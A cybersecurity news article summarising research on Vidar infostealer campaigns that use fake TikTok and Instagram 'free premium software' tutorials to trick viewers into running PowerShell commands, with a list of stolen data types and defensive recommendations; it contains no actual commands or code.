Vidar Infostealer Spreads via Fake TikTok and Instagram Tutorials

Cybercriminals have adapted their malware distribution tactics for the short-video era, using TikTok and Instagram Reels to spread Vidar infostealer through fake software tutorials. Research published by ReversingLabs this week documents two distinct campaigns that leverage social media's algorithmic amplification to reach victims at scale.

The campaigns target users searching for free access to premium software, particularly Spotify Premium. Attackers create polished instructional videos complete with Windows-style branding and professional voiceovers, instructing viewers to paste commands into PowerShell that ultimately download and execute Vidar. One tutorial accumulated over 100,000 views with thousands of saves and shares—metrics that boost algorithmic visibility and expand reach.

Campaign Structure

ReversingLabs identified two parallel operations with slightly different approaches.

The first campaign relies on direct tutorials. Accounts using names like "windows.tips" and "windows.insights" post videos claiming to unlock paid software for free. The videos walk viewers through opening PowerShell and executing commands that supposedly activate premium features. Instead, the commands download Vidar payloads.

The second campaign builds engagement first. Videos promote free premium access but withhold instructions, encouraging comments and follows. Users are directed to external sites offering "free software, games and AI tools," often requiring survey completion and redirect chains before reaching download links.

Both approaches exploit the trust users place in seemingly helpful content creators. As researchers noted, "a non-technical user does not know any better, and may assume it is legitimate."

What Vidar Steals

Vidar is a well-established infostealer sold as a service for a $300 lifetime license. Once installed, it harvests a broad range of sensitive data:

• Saved browser passwords and autofill data
• Browser cookies and session tokens
• Cryptocurrency wallet credentials
• Two-factor authentication app data
• TOR browser data
• Financial and payment information

Everything collected is exfiltrated to attacker-controlled servers. For organizations concerned about credential theft, this campaign represents another vector for initial access—employees who execute these payloads on personal devices may have corporate credentials stored in their browsers.

This attack chain differs from traditional phishing approaches but achieves the same goal: social engineering victims into executing malicious code. The visual format and entertainment context make the deception harder to recognize.

Platform Response

ReversingLabs reported the malicious accounts to Instagram. The platform declined to take action, leaving the campaigns active at publication time.

This mirrors ongoing challenges with social media content moderation and malware distribution. Short-video platforms optimize for engagement rather than security review, and the volume of content makes comprehensive screening impractical. Similar tactics have appeared on other platforms—we covered ClickFix campaigns targeting Ghost CMS sites earlier this month that used comparable social engineering approaches.

Recommended Actions

Users should approach "free premium software" tutorials with extreme skepticism. Any video instructing viewers to paste commands into a terminal or PowerShell is almost certainly malicious. Legitimate software companies don't distribute premium access through TikTok tutorials.

For organizations, this campaign reinforces the need for:

1. User awareness training covering social engineering on video platforms, not just email phishing
2. Endpoint detection capable of identifying infostealer behavior patterns
3. Password manager adoption to reduce credential exposure in browser storage
4. Credential monitoring to detect when employee credentials appear in infostealer logs

Vidar infections often serve as the entry point for larger compromises. Stolen credentials enable account takeover, which can escalate to corporate network access, data theft, and ransomware deployment. Treat any confirmed Vidar infection as a potential precursor to broader compromise.